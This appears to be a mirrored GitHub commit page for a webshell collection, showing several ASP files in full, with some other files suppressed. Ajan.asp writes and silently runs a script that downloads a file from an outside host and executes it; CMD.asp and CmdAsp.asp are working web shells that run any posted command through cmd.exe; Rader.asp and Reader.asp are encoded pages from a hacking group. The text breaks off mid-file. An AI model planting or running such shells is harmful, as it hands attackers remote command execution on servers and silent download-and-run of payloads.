mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
reupdate xakepshell
This commit is contained in:
parent
82dda2540f
commit
a4229cf9dc
171 changed files with 164183 additions and 0 deletions
30
xakep-shells/ASP/Ajan.asp.txt
Normal file
30
xakep-shells/ASP/Ajan.asp.txt
Normal file
|
@ -0,0 +1,30 @@
|
|||
<SCRIPT LANGUAGE="VBScript">
|
||||
<%
|
||||
Set entrika = CreateObject("Scripting.FileSystemObject")
|
||||
Set entrika = entrika.CreateTextFile("c:\net.vbs", True)
|
||||
entrika.write "Dim BinaryData" & vbcrlf
|
||||
entrika.write "Dim xml" & vbcrlf
|
||||
entrika.write "Set xml = CreateObject(""Microsoft.XMLHTTP"")" & vbcrlf
|
||||
entrika.write "xml.Open ""GET"",""http://www35.websamba.com/cybervurgun/file.zip"",False" & vbcrlf
|
||||
entrika.write "xml.Send" & vbcrlf
|
||||
entrika.write "BinaryData = xml.ResponsebOdy" & vbcrlf
|
||||
entrika.write "Const adTypeBinary = 1" & vbcrlf
|
||||
entrika.write "Const adSaveCreateOverWrite = 2" & vbcrlf
|
||||
entrika.write "Dim BinaryStream" & vbcrlf
|
||||
entrika.write "Set BinaryStream = CreateObject(""ADODB.Stream"")" & vbcrlf
|
||||
entrika.write "BinaryStream.Type = adTypeBinary" & vbcrlf
|
||||
entrika.write "BinaryStream.Open" & vbcrlf
|
||||
entrika.write "BinaryStream.Write BinaryData" & vbcrlf
|
||||
entrika.write "BinaryStream.SaveToFile ""c:\downloaded.zip"", adSaveCreateOverWrite" & vbcrlf
|
||||
entrika.write "Dim WshShell" & vbcrlf
|
||||
entrika.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
|
||||
entrika.write "WshShell.Run ""c:\downloaded.zip"", 0, false" & vbcrlf
|
||||
entrika.close
|
||||
Set entrika = Nothing
|
||||
Set entrika = Nothing
|
||||
|
||||
Dim WshShell
|
||||
Set WshShell = CreateObject("WScript.Shell")
|
||||
WshShell.Run "c:\net.vbs", 0, false
|
||||
%>
|
||||
</SCRIPT>
|
53
xakep-shells/ASP/CMD.asp.txt
Normal file
53
xakep-shells/ASP/CMD.asp.txt
Normal file
|
@ -0,0 +1,53 @@
|
|||
<%@ Language=VBScript %>
|
||||
<%
|
||||
' --------------------o0o--------------------
|
||||
' File: CmdAsp.asp
|
||||
' Author: Maceo <maceo @ dogmile.com>
|
||||
' Release: 2000-12-01
|
||||
' OS: Windows 2000, 4.0 NT
|
||||
' -------------------------------------------
|
||||
|
||||
Dim oScript
|
||||
Dim oScriptNet
|
||||
Dim oFileSys, oFile
|
||||
Dim szCMD, szTempFile
|
||||
|
||||
On Error Resume Next
|
||||
|
||||
' -- create the COM objects that we will be using -- '
|
||||
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
|
||||
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
|
||||
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
|
||||
|
||||
' -- check for a command that we have posted -- '
|
||||
szCMD = Request.Form(".CMD")
|
||||
If (szCMD <> "") Then
|
||||
|
||||
' -- Use a poor man's pipe ... a temp file -- '
|
||||
szTempFile = "C:\" & oFileSys.GetTempName( )
|
||||
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
|
||||
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
|
||||
|
||||
End If
|
||||
|
||||
%>
|
||||
<HTML>
|
||||
<BODY>
|
||||
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
|
||||
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
|
||||
<input type=submit value="Run">
|
||||
</FORM>
|
||||
<PRE>
|
||||
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
|
||||
<br>
|
||||
<%
|
||||
If (IsObject(oFile)) Then
|
||||
' -- Read the output from our command and remove the temp file -- '
|
||||
On Error Resume Next
|
||||
Response.Write Server.HTMLEncode(oFile.ReadAll)
|
||||
oFile.Close
|
||||
Call oFileSys.DeleteFile(szTempFile, True)
|
||||
End If
|
||||
%>
|
||||
</BODY>
|
||||
</HTML>
|
55
xakep-shells/ASP/CmdAsp.asp.txt
Normal file
55
xakep-shells/ASP/CmdAsp.asp.txt
Normal file
|
@ -0,0 +1,55 @@
|
|||
<++ CmdAsp.asp ++>
|
||||
<%@ Language=VBScript %>
|
||||
<%
|
||||
' --------------------o0o--------------------
|
||||
' File: CmdAsp.asp
|
||||
' Author: Maceo <maceo @ dogmile.com>
|
||||
' Release: 2000-12-01
|
||||
' OS: Windows 2000, 4.0 NT
|
||||
' -------------------------------------------
|
||||
|
||||
Dim oScript
|
||||
Dim oScriptNet
|
||||
Dim oFileSys, oFile
|
||||
Dim szCMD, szTempFile
|
||||
|
||||
On Error Resume Next
|
||||
|
||||
' -- create the COM objects that we will be using -- '
|
||||
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
|
||||
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
|
||||
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
|
||||
|
||||
' -- check for a command that we have posted -- '
|
||||
szCMD = Request.Form(".CMD")
|
||||
If (szCMD <> "") Then
|
||||
|
||||
' -- Use a poor man's pipe ... a temp file -- '
|
||||
szTempFile = "C:\" & oFileSys.GetTempName( )
|
||||
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
|
||||
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
|
||||
|
||||
End If
|
||||
|
||||
%>
|
||||
<HTML>
|
||||
<BODY>
|
||||
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
|
||||
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
|
||||
<input type=submit value="Run">
|
||||
</FORM>
|
||||
<PRE>
|
||||
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
|
||||
<br>
|
||||
<%
|
||||
If (IsObject(oFile)) Then
|
||||
' -- Read the output from our command and remove the temp file -- '
|
||||
On Error Resume Next
|
||||
Response.Write Server.HTMLEncode(oFile.ReadAll)
|
||||
oFile.Close
|
||||
Call oFileSys.DeleteFile(szTempFile, True)
|
||||
End If
|
||||
%>
|
||||
</BODY>
|
||||
</HTML>
|
||||
<-- CmdAsp.asp -->
|
2
xakep-shells/ASP/CyberSpy5.Asp.txt
Normal file
2
xakep-shells/ASP/CyberSpy5.Asp.txt
Normal file
File diff suppressed because one or more lines are too long
57
xakep-shells/ASP/EFSO_2.asp.txt
Normal file
57
xakep-shells/ASP/EFSO_2.asp.txt
Normal file
File diff suppressed because one or more lines are too long
2324
xakep-shells/ASP/Elmali Seker.asp.txt
Normal file
2324
xakep-shells/ASP/Elmali Seker.asp.txt
Normal file
File diff suppressed because it is too large
Load diff
1012
xakep-shells/ASP/NT Addy.asp.txt
Normal file
1012
xakep-shells/ASP/NT Addy.asp.txt
Normal file
File diff suppressed because it is too large
Load diff
116
xakep-shells/ASP/Rader.asp.txt
Normal file
116
xakep-shells/ASP/Rader.asp.txt
Normal file
|
@ -0,0 +1,116 @@
|
|||
<%@ LANGUAGE = VBScript.Encode %>
|
||||
|
||||
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<meta http-equiv="Content-Language" content="tr">
|
||||
<!--
|
||||
|
||||
|
||||
|
||||
HACKING
|
||||
Mehdi & HolyDemon
|
||||
www.infilak.tr.cx & www.infilaktim.tk
|
||||
|
||||
-->
|
||||
<%#@~^FAAAAA==G PnMDKDPM+k;:PU+XYtwcAAA==^#~@%>
|
||||
<%#@~^2QgAAA==@#@&w.K{ l:P{~JU+^DYor^+/r@#@&HlybsCD,',J@!Vr@*&RHRw~JLw.G|xlhnLJ~?1.bwObxbP|!V^Cx9ýðýxý"PÝçbx~Pþ+30ü.PAN+Mr"R@!Vb@*~A;~Um.kaOk P3U,Öx+hsbPÖ"+^sbðk~"l0kw^+MrPVk8k,|CzýDP`^Go*P@!(.@*Y!Yslhldý[ýMR R@!sk@*A;~UmDr2DkUPgCkýV~nE^Vl ýVm^lðý,5CD9ý:~$ö^ü:üx9nPt+\1;OY!D,rVEz;aYCP_CVmP)U^l:C"klUýy,ASh bx6kVm3cODcmaPUkOnkkxbUPwWD!h~Aö^ü:ü Nnx~)HDýUYý^ý~AbVLrHkP$;^l8k^rM/r k.RR,@!^r@*Il.NýsP#n,f+kO+0V+MrUNx,fGVCzý,CGVH9+sWU~j+P3VKDG:mUEl~ÇKW0PKþ+0VüD,2[+Mkh c@!Vb@*?1DkaOr:bybP!ü\nU^+~|!sVmxC8bVk.dbxryc @!Vr@*|!VVmxýs~Cm3Výx9l~!xkþ,$k^ok,)s:m3,ÝçkUP( gRoPz[:bx~#Xl~!öM+-VbsDrHVPMöMüþüxü. R@!4.@*@!4.@*@!4D@*@!4M@*@!(.@*@!(D@*@!8D@*@!(D@*@!(.@*@!0GUDPmGsKDxD[@*@!^xD+D@*@!(@*A`P$ÝI,q HcsPU6s:P5zt(S&H&f(I @!J4@*@!(.@*@!4.@*@!0WUO,mGVK.{4s!+@*$P_l0~MV[k,ACOý^P}mrV,rV9;~T@!4M@*@!t.~1WsWMx4^l^V,/k"n{G@*@!(.@*@!^xD+D@*@!m~tM+W'4YO2=zzSAhckx6rsl0RDD ma@*qh R&UsbSCVcKD /o@!&l@*' 4daiLx4kwp'x(/2iLx8dai[ 8/ai[ 8dwp@!mP4DnW{tOYalzJhAAc+3G.K:Cxch3C kcmWs@*AVWMWhl R\n0lxb ZK:@!JC@*[ 4kwI[U8kwI[ 8/ai'U(/wI' 4dwp' 4dai@!lP4DW'4YOw=z&AShR0CDkWxWdl +kk YV@*nl./KU26/CU/k O0@!&l@*' 4daiLx4kwp'x(/2iLx8dai[ 8/ai[ 8dwp@!(D@*@!8.@*@!CP4.+6'hCbVYGlslrV(Gs4@$4WD:lbVc^Ws@*\+4Nr@!Jl@*LU4kwiLU8/aiLx8/2ILx8/aI[ 4d2p[x8dai@!l,4M+W{:mkVDW=4W^X[+sWU@$4WYsCk^RmKh@*CKVHfn:GU@!zC@*LU4kwI' 4/2ILx8/aILx8kwp[x(/aI[ 4dwp@!C~4D+6x:mkVDGl+M3mxqc*@$sXU+D mK:@*30WDGhmx@!zm@*@!4.@*@!(D@*@!l,4D0xtDY2lJzhSARbx0bsC3cYMR^6@*(c1 s@!&l@*J@#@&4+V2~{PEA!~km.bwDPHt9rP:l.l6ýx[C PqcHRwPKChPzNý l~5C"ý^:ýþOýDc@!4M@*@!sb@*Üm.nDVrPjn,Üm.Ykky,bk2P_WdY^l.ýU,Kü:ü [+,ÇlVýþýM @!(D@*@!sk@*@!J4@*b9.+kPjCDýDýPFýdsýxCPnG9EU!PVöDüxDüVh+0PÝdYNrðr ky,9WkXl ýU~b9ýxý,XCyýU c@!8D@*@!Vb@*PnXYl.nmP$öVüsü~Að+.,AKþ/l,CmOl,.CD,fnh3Yb.R@!4D@*@!sk@*|!D8lUýU,fG/HCVmDýUý~VöDüxOüsXn4bss+V,Ýçk PbHxý,j+M\nD9+~6^:l ý"Pdlyýs~uN9Pwl.3nOs+"Rc~@!(D@*@!^k@*)[M+dPnýdsýxC,Km:Pj+MrPVk.k^k.~vöDx=~N=-h8wl^k1lU-[n6l;VD lkw@!8M@*@!^n YnD@*@!6WUDP1WVKD{.+9@*H+^+.~Ilwm8k^kDbh@!z6W Y@*@!&^xO+M@*@!(D@*@!^k@*jrD+[+0r,kU1V!N+^+MrPDlVkaPn[D+0~b9:k ~Kl +^kU+~i^lþhl@!8D@*@!sr@*bNhr PÞr0MnkkUbPÇmV:m@!(.@*@!Vr@*U+ddbWx,#+,ZWKVr+,fð+.Vn.bPÇCVm.l0PJGTkx~6^:C@!(.@*@!sb@*UkYV.k P#+Mk~Pm4l slMýxýPÝ [rDs+,\dR @!4.@*@!8D@*@!^n Y+.@*@!0GxD~1WsKD{/k^\.@*@!l~tM+Wxslk^OW=:lbs8Ws4@$tGYhCbV mKh@*@!0GUDPmGsKDx/bs7+.@*HACfÝ@!zm@*Pr9LwCAA==^#~@%><title>I.N.F HACKING CENTER - <%=#@~^CAAAAA==2MWm ls+UQMAAA==^#~@%> - www.infilak.tr.cx</title><%#@~^HAEAAA==@#@&l^DP{PI;!n/DR}EDzjDDk L`rlmDrGxr#@#@&(0~C1Y~',EtV2E,KtnU@#@&^l^s,XCMNb:@#@&+ [Pb0@#@&0VCdKDP{~D;EdOR6WM:cJVsm/GDrb@#@&kds:Px~M+5EdDRWKDs`Jb/^n:r#@#@&b0~rkV+sxJrPY4nU@#@&kkVn:~x,J[EME@#@&+U[,k0@#@&b0~3^CkW.,',JJ,Y4nx,3slkW.x,D+$;+kYRkn.\D7l.kC8^+d`r)nhSmK_5?(/zSmnzP_Jb@#@&gVMAAA==^#~@%><center> <%#@~^UAAAAA==@#@&DnkwKx/RS.kD+~J@!4G[HP4T^W^WD{:f&2&2&@*@!8G9X~YK2:mDLr '*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width="75%" border=0 bgcolor=black><tr><td><table width="100%" border=0 bgcolor="#666666" cellpadding=1 cellspacing=1><tr><td><center> <%#@~^WQAAAA==@#@&DnkwKx/RS.kD+~J@!khL,/D1xtDYw=&&+cNK:CkU[^6 mKhz0l.dKxF&r 0sWTGcor6P4+kTtDx,y@*E@#@&fhwAAA==^#~@%></td></tr><td bgcolor="#999999" height=32> <Font size=2 Color=000000 Face=Verdana><b>Adres : </b> </Font> <input type=hidden name=islem value=basla> <input type=text name=klasor size=49 value="<%=#@~^BgAAAA==V^ldKDjAIAAA==^#~@%>"> <input type=submit value="Kodlarý Göster" name=submit> </Font> <a href=mailto:mailbomb@hotmail.com title="E-mail Gönder"><font face=wingdings color=lime size=4>*</font> </a> <a href=http://www.infilaktim.tk title="I.N.F Sitesi" target=_blank><font face=wingdings color=lime size=4>M</font> </a> <a href="?action=help" title="Yardým" target=inf onClick="window.open('?action=help','inf','width=450,height=400 toolbar=no scrollbars=yes' )"><font face=wingdings color=lime size=4>&</font> </a> </td></tr></form></td></table></td></tr><tr><td><table width="100%" border=0 align=center><tr><td bgcolor="#CCCCCC" height=359><%#@~^QwAAAA==r6PUKY,k/^+s~',J8lkVCE,YtU@#@&D+k2Gxk+ch.kOn,JE[HCybVC.LJJ@#@&Vd+nBQAAA==^#~@%><br><center><textarea rows=24 name=kodlar cols=90>
|
||||
<%#@~^yAAAAA==jY~K4NCK:n,xPU+.\D /M+lDnr(L+1OcJtk1DG/GWDRpHduK:nEb@#@&W8%_KPnc6a+U,JV2Kr~,EJL3slkW.'rJ~,Wl^/+@#@&G4NC:KKRjn N@#@&0GN^l.~{P/n.7+.R4OsV3 mKN+vW(%C:KKR"+d2Kx/P+XY#@#@&.+kwKxd+ AMkO+,VW9VC.@#@&+U[,kWoT4AAA==^#~@%>
|
||||
<%#@~^CQAAAA==j`A~UkDkVDwMAAA==^#~@%><style>TD {
|
||||
FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
|
||||
}
|
||||
BODY {
|
||||
FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
|
||||
}
|
||||
P {
|
||||
FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
|
||||
}
|
||||
DIV {
|
||||
FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
|
||||
}
|
||||
|
||||
A:link {
|
||||
COLOR: #006699; TEXT-DECORATION: none
|
||||
}
|
||||
A:active {
|
||||
COLOR: #006699; TEXT-DECORATION: none
|
||||
}
|
||||
A:visited {
|
||||
COLOR: #006699; TEXT-DECORATION: none
|
||||
}
|
||||
A.postlink {
|
||||
COLOR: #006699; TEXT-DECORATION: none
|
||||
}
|
||||
A:hover {
|
||||
COLOR: #dd6900
|
||||
}
|
||||
.bodyline {
|
||||
BORDER-RIGHT: #98aab1 1px solid; BORDER-TOP: #98aab1 1px solid; BACKGROUND: #ffffff; BORDER-LEFT: #98aab1 1px solid; BORDER-BOTTOM: #98aab1 1px solid
|
||||
}
|
||||
INPUT {
|
||||
BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BACKGROUND-COLOR: #fcfcfc; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #006699
|
||||
}
|
||||
TEXTAREA {
|
||||
BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BACKGROUND-COLOR: #fcfcfc; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #006699
|
||||
}
|
||||
SELECT {
|
||||
BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BORDER-RIGHT-COLOR: #006699
|
||||
}
|
||||
IMG {
|
||||
BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px
|
||||
}
|
||||
TH {
|
||||
PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKGROUND: #f9bc5e url('images/navbar.jpg'); COLOR: #713600; WHITE-SPACE: nowrap; HEIGHT: 27px; TEXT-ALIGN: center
|
||||
}
|
||||
TD.cat {
|
||||
FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: 4px; LETTER-SPACING: 1px; HEIGHT: 27px
|
||||
}
|
||||
.title {
|
||||
FONT-WEIGHT: bold; FONT-SIZE: 13px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
|
||||
}
|
||||
.content {
|
||||
BACKGROUND: none transparent scroll repeat 0% 0%; FONT-FAMILY: Verdana, Helvetica
|
||||
}
|
||||
.block-title {
|
||||
FONT-SIZE: 11px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica
|
||||
}
|
||||
.storytitle {
|
||||
FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #713600; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
|
||||
}
|
||||
.storycat {
|
||||
FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: underline
|
||||
}
|
||||
.boxtitle {
|
||||
FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
|
||||
}
|
||||
.boxcontent {
|
||||
FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: red; FONT-FAMILY: Verdana, Helvetica
|
||||
}
|
||||
.option {
|
||||
FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
|
||||
}
|
||||
.ok {
|
||||
FONT-WEIGHT: normal; FONT-SIZE: 9px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #000000; FONT-FAMILY: webdings; TEXT-DECORATION: none
|
||||
}</style><style><!--
|
||||
body {scrollbar-face-color: #000000; scrollbar-shadow-color: #003333; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #003333; scrollbar-darkshadow-color: #000000; scrollbar-track-color: #993300; scrollbar-arrow-color: #CC3300;}
|
||||
}
|
||||
// --></style><%#@~^BwAAAA==n N~kE(oQIAAA==^#~@%>
|
||||
|
||||
<%#@~^CgAAAA==d!4~HlMNks8AMAAA==^#~@%><title><%=#@~^CAAAAA==2MWm ls+UQMAAA==^#~@%></title><body bgcolor=#333333><br><center><font color=red><h4><%=#@~^CAAAAA==2MWm ls+UQMAAA==^#~@%></center>
|
||||
<font color=lime>
|
||||
<%=#@~^BAAAAA==4V2qQEAAA==^#~@%>
|
||||
<%#@~^HwAAAA==@#@&DnkwKx/RUN@#@&nx9Pd;(@#@&ugcAAA==^#~@%>
|
||||
|
||||
|
||||
</textarea>
|
||||
<noscript><noscript><plaintext><plaintext>
|
||||
<!--
|
||||
|
||||
HACKING
|
||||
|
||||
www.infilak.tr.cx
|
||||
Mehdi & HolyDemon
|
||||
INF TEAM DURMAZ , DURDURULAMAZ
|
||||
Hak Geldi Batýl Zail Oldu..
|
||||
-->
|
116
xakep-shells/ASP/Reader.asp.txt
Normal file
116
xakep-shells/ASP/Reader.asp.txt
Normal file
|
@ -0,0 +1,116 @@
|
|||
<%@ LANGUAGE = VBScript.Encode %>
|
||||
|
||||
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<meta http-equiv="Content-Language" content="tr">
|
||||
<!--
|
||||
|
||||
|
||||
|
||||
HACKING
|
||||
Mehdi & HolyDemon
|
||||
www.infilak.tr.cx & www.infilaktim.tk
|
||||
|
||||
-->
|
||||
<%#@~^FAAAAA==G PnMDKDPM+k;:PU+XYtwcAAA==^#~@%>
|
||||
<%#@~^2QgAAA==@#@&w.K{ l:P{~JU+^DYor^+/r@#@&HlybsCD,',J@!Vr@*&RHRw~JLw.G|xlhnLJ~?1.bwObxbP|!V^Cx9ýðýxý"PÝçbx~Pþ+30ü.PAN+Mr"R@!Vb@*~A;~Um.kaOk P3U,Öx+hsbPÖ"+^sbðk~"l0kw^+MrPVk8k,|CzýDP`^Go*P@!(.@*Y!Yslhldý[ýMR R@!sk@*A;~UmDr2DkUPgCkýV~nE^Vl ýVm^lðý,5CD9ý:~$ö^ü:üx9nPt+\1;OY!D,rVEz;aYCP_CVmP)U^l:C"klUýy,ASh bx6kVm3cODcmaPUkOnkkxbUPwWD!h~Aö^ü:ü Nnx~)HDýUYý^ý~AbVLrHkP$;^l8k^rM/r k.RR,@!^r@*Il.NýsP#n,f+kO+0V+MrUNx,fGVCzý,CGVH9+sWU~j+P3VKDG:mUEl~ÇKW0PKþ+0VüD,2[+Mkh c@!Vb@*?1DkaOr:bybP!ü\nU^+~|!sVmxC8bVk.dbxryc @!Vr@*|!VVmxýs~Cm3Výx9l~!xkþ,$k^ok,)s:m3,ÝçkUP( gRoPz[:bx~#Xl~!öM+-VbsDrHVPMöMüþüxü. R@!4.@*@!4.@*@!4D@*@!4M@*@!(.@*@!(D@*@!8D@*@!(D@*@!(.@*@!0GUDPmGsKDxD[@*@!^xD+D@*@!(@*A`P$ÝI,q HcsPU6s:P5zt(S&H&f(I @!J4@*@!(.@*@!4.@*@!0WUO,mGVK.{4s!+@*$P_l0~MV[k,ACOý^P}mrV,rV9;~T@!4M@*@!t.~1WsWMx4^l^V,/k"n{G@*@!(.@*@!^xD+D@*@!m~tM+W'4YO2=zzSAhckx6rsl0RDD ma@*qh R&UsbSCVcKD /o@!&l@*' 4daiLx4kwp'x(/2iLx8dai[ 8/ai[ 8dwp@!mP4DnW{tOYalzJhAAc+3G.K:Cxch3C kcmWs@*AVWMWhl R\n0lxb ZK:@!JC@*[ 4kwI[U8kwI[ 8/ai'U(/wI' 4dwp' 4dai@!lP4DW'4YOw=z&AShR0CDkWxWdl +kk YV@*nl./KU26/CU/k O0@!&l@*' 4daiLx4kwp'x(/2iLx8dai[ 8/ai[ 8dwp@!(D@*@!8.@*@!CP4.+6'hCbVYGlslrV(Gs4@$4WD:lbVc^Ws@*\+4Nr@!Jl@*LU4kwiLU8/aiLx8/2ILx8/aI[ 4d2p[x8dai@!l,4M+W{:mkVDW=4W^X[+sWU@$4WYsCk^RmKh@*CKVHfn:GU@!zC@*LU4kwI' 4/2ILx8/aILx8kwp[x(/aI[ 4dwp@!C~4D+6x:mkVDGl+M3mxqc*@$sXU+D mK:@*30WDGhmx@!zm@*@!4.@*@!(D@*@!l,4D0xtDY2lJzhSARbx0bsC3cYMR^6@*(c1 s@!&l@*J@#@&4+V2~{PEA!~km.bwDPHt9rP:l.l6ýx[C PqcHRwPKChPzNý l~5C"ý^:ýþOýDc@!4M@*@!sb@*Üm.nDVrPjn,Üm.Ykky,bk2P_WdY^l.ýU,Kü:ü [+,ÇlVýþýM @!(D@*@!sk@*@!J4@*b9.+kPjCDýDýPFýdsýxCPnG9EU!PVöDüxDüVh+0PÝdYNrðr ky,9WkXl ýU~b9ýxý,XCyýU c@!8D@*@!Vb@*PnXYl.nmP$öVüsü~Að+.,AKþ/l,CmOl,.CD,fnh3Yb.R@!4D@*@!sk@*|!D8lUýU,fG/HCVmDýUý~VöDüxOüsXn4bss+V,Ýçk PbHxý,j+M\nD9+~6^:l ý"Pdlyýs~uN9Pwl.3nOs+"Rc~@!(D@*@!^k@*)[M+dPnýdsýxC,Km:Pj+MrPVk.k^k.~vöDx=~N=-h8wl^k1lU-[n6l;VD lkw@!8M@*@!^n YnD@*@!6WUDP1WVKD{.+9@*H+^+.~Ilwm8k^kDbh@!z6W Y@*@!&^xO+M@*@!(D@*@!^k@*jrD+[+0r,kU1V!N+^+MrPDlVkaPn[D+0~b9:k ~Kl +^kU+~i^lþhl@!8D@*@!sr@*bNhr PÞr0MnkkUbPÇmV:m@!(.@*@!Vr@*U+ddbWx,#+,ZWKVr+,fð+.Vn.bPÇCVm.l0PJGTkx~6^:C@!(.@*@!sb@*UkYV.k P#+Mk~Pm4l slMýxýPÝ [rDs+,\dR @!4.@*@!8D@*@!^n Y+.@*@!0GxD~1WsKD{/k^\.@*@!l~tM+Wxslk^OW=:lbs8Ws4@$tGYhCbV mKh@*@!0GUDPmGsKDx/bs7+.@*HACfÝ@!zm@*Pr9LwCAA==^#~@%><title>I.N.F HACKING CENTER - <%=#@~^CAAAAA==2MWm ls+UQMAAA==^#~@%> - www.infilak.tr.cx</title><%#@~^HAEAAA==@#@&l^DP{PI;!n/DR}EDzjDDk L`rlmDrGxr#@#@&(0~C1Y~',EtV2E,KtnU@#@&^l^s,XCMNb:@#@&+ [Pb0@#@&0VCdKDP{~D;EdOR6WM:cJVsm/GDrb@#@&kds:Px~M+5EdDRWKDs`Jb/^n:r#@#@&b0~rkV+sxJrPY4nU@#@&kkVn:~x,J[EME@#@&+U[,k0@#@&b0~3^CkW.,',JJ,Y4nx,3slkW.x,D+$;+kYRkn.\D7l.kC8^+d`r)nhSmK_5?(/zSmnzP_Jb@#@&gVMAAA==^#~@%><center> <%#@~^UAAAAA==@#@&DnkwKx/RS.kD+~J@!4G[HP4T^W^WD{:f&2&2&@*@!8G9X~YK2:mDLr '*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width="75%" border=0 bgcolor=black><tr><td><table width="100%" border=0 bgcolor="#666666" cellpadding=1 cellspacing=1><tr><td><center> <%#@~^WQAAAA==@#@&DnkwKx/RS.kD+~J@!khL,/D1xtDYw=&&+cNK:CkU[^6 mKhz0l.dKxF&r 0sWTGcor6P4+kTtDx,y@*E@#@&fhwAAA==^#~@%></td></tr><td bgcolor="#999999" height=32> <Font size=2 Color=000000 Face=Verdana><b>Adres : </b> </Font> <input type=hidden name=islem value=basla> <input type=text name=klasor size=49 value="<%=#@~^BgAAAA==V^ldKDjAIAAA==^#~@%>"> <input type=submit value="Kodlarý Göster" name=submit> </Font> <a href=mailto:mailbomb@hotmail.com title="E-mail Gönder"><font face=wingdings color=lime size=4>*</font> </a> <a href=http://www.infilaktim.tk title="I.N.F Sitesi" target=_blank><font face=wingdings color=lime size=4>M</font> </a> <a href="?action=help" title="Yardým" target=inf onClick="window.open('?action=help','inf','width=450,height=400 toolbar=no scrollbars=yes' )"><font face=wingdings color=lime size=4>&</font> </a> </td></tr></form></td></table></td></tr><tr><td><table width="100%" border=0 align=center><tr><td bgcolor="#CCCCCC" height=359><%#@~^QwAAAA==r6PUKY,k/^+s~',J8lkVCE,YtU@#@&D+k2Gxk+ch.kOn,JE[HCybVC.LJJ@#@&Vd+nBQAAA==^#~@%><br><center><textarea rows=24 name=kodlar cols=90>
|
||||
<%#@~^yAAAAA==jY~K4NCK:n,xPU+.\D /M+lDnr(L+1OcJtk1DG/GWDRpHduK:nEb@#@&W8%_KPnc6a+U,JV2Kr~,EJL3slkW.'rJ~,Wl^/+@#@&G4NC:KKRjn N@#@&0GN^l.~{P/n.7+.R4OsV3 mKN+vW(%C:KKR"+d2Kx/P+XY#@#@&.+kwKxd+ AMkO+,VW9VC.@#@&+U[,kWoT4AAA==^#~@%>
|
||||
<%#@~^CQAAAA==j`A~UkDkVDwMAAA==^#~@%><style>TD {
|
||||
FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
|
||||
}
|
||||
BODY {
|
||||
FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
|
||||
}
|
||||
P {
|
||||
FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
|
||||
}
|
||||
DIV {
